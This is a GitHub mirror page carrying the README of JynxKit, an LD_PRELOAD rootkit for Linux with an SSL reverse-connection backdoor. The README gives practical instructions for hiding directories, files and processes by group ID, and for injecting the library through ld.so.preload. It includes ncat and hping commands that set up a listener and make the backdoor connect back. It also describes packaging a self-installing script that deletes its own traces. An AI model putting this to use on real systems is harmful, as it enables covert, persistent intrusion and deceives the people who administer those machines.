attackgithub / jynxkit Goto Github PK
View Code? Open in Web Editor NEWThis project forked from chokepoint/jynxkit
JynxKit is an LD_PRELOAD userland rootkit for Linux systems with reverse connection SSL backdoor
jynxkit's Introduction
_ _,.-.' .-.
_ .' |,' ."".| |.""._
( || ,',"". `._`' ` ' `.
`\ | `" .-"`-..` . `.
| `..--.._ | \
_,| _...'_.' ,+. `.
,""'| `...-'..""(__.._ -" `"--.. `.
|`._,' ,' /\ .'""` .'""`. `. | `. \
' / / / || || |.`.`. . | \
`.__,'-._' /|` -"' `-.' \ \ \ `"-' \
' `. / /_| | |'""| | .-""'`'"`-,.-"\ .
. / .\ . / | | `._.' || ,' \ \
' / / |/ /_.-+._`-..--"-. . . \ `
/ /.' ' ,'""'-. `"."'""'`.. |. \ \
/ . | j . . | |\__," |. ` ' \
. | | | | ' | '| | ' ` \ \ .
| | | `.____,' ..____,' | | . \
| | | | ._ _..---._ _,' | . '
| | | | | "" . |`"' \ `.| ' ' ' .
| | | | | | | ` ` . . \ |
| | | | | ' | \ `. | | . |
' ' | | | . ` \ \ | | | |
\ ` | | | . `. | | | |
\ \ ' | ` ' ` `+..|___|___|_........
\ \ \| ' . `. `. |
`. \ . . ` `. `-. .'
_,'`. \' . \ `-.._ `._ ,'
_." `._ `.` | . `._ .
`._ _,`"--`. | . `. |
`-._ ,' | `. `|_
,' | | `. `.
.' __...__.| | \ __..._ _,..,.__ `.
`-`"' `._..--'-.__ .' `-..' ``'"--..-'
`"---'
/$$$$$ /$$ /$$ /$$ /$$
|__ $$ | $$ /$$/|__/ | $$
| $$ /$$ /$$ /$$$$$$$ /$$ /$$ | $$ /$$/ /$$ /$$$$$$
| $$| $$ | $$| $$__ $$| $$ /$$//$$$$$$| $$$$$/ | $$|_ $$_/
/$$ | $$| $$ | $$| $$ \ $$ \ $$$$/|______/| $$ $$ | $$ | $$
| $$ | $$| $$ | $$| $$ | $$ >$$ $$ | $$\ $$ | $$ | $$ /$$
| $$$$$$/| $$$$$$$| $$ | $$ /$$/\ $$ | $$ \ $$| $$ | $$$$/
\______/ \____ $$|__/ |__/|__/ \__/ |__/ \__/|__/ \___/
/$$ | $$
| $$$$$$/
\______/
BlackHatAcademy.org
ErrProne / XO
File list: bc.c config.h ld_poison.so Makefile packer.sh README
0x01. Setting up config.h.
First of all, you need to dig into config.h, and ensure that the settings meet your needs.
MAGIC_DIR should be changed to the name of the directory you want to hide from the system. This can
be used as a prefix to your main directory as well as for files. MAGIC_GID will be the Group ID to
hide as well. Make sure that you set MAGIC_DIR Group ID to MAGIC_GID for hiding purposes as well.
This will help disguise the processes from the system, including commands like ps. CONFIG_FILE
defaults to ld.so.preload, which is usually located in /etc. You shouldn't have to change this
unless you're going to dig a little deeper into hiding Jynx-Kit. MAGIC_ACK and MAGIC_SEQ are both
used as the port knock sequence for back connect. The back connect program automatically sets GID
to MAGIC_GID, so no need to worry about this. You'll initiate the back connect using a program like
hping to manipulate the packets as needed.
# ncat --ssl -l -p 31337 # setup ssl listener
# hping localhost -s 31337 -M <MAGIC_SEQ> -L <MAGIC_ACK> -c 1 # make back connect phone home
0x02. Configuring Makefile and Installing.
Once you have this configured, go ahead and open up Makefile. Make sure that MAGIC_GID
matches what you have in config.h. INSTALL should be set to the directory that you want to hide
your files in. You can also set these variables upon calling "make install." See examples below.
# make all # compile bc and ld_poison.so
# make install # Installs bc and ld_poison, injects into ld preload, and sets correct GIDs
# make install INSTALL=/omgxochi MAGIC_GID=100
The last line installs the kid to /omgxochi, and sets the GID to 100. You should use GID
of 100 for anything that you're going to run, and need to hide from the system.
0x03. packer.sh
Now that you have everything configured and things compile correctly, you can use packer.sh
in order to create an auto install shell script for future installations. Simply edit INSTALL_FILE
and FILES variables (if you added or removed any files that originally came with Jynx-Kit). By
default, packer.sh creates install.sh, which can be run on any system, it will extract the source
files, compile them, and install them to the defined hidden directory, then clean up all of the files.
jynxkit's People
Watchers
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. ๐๐๐
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google โค๏ธ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.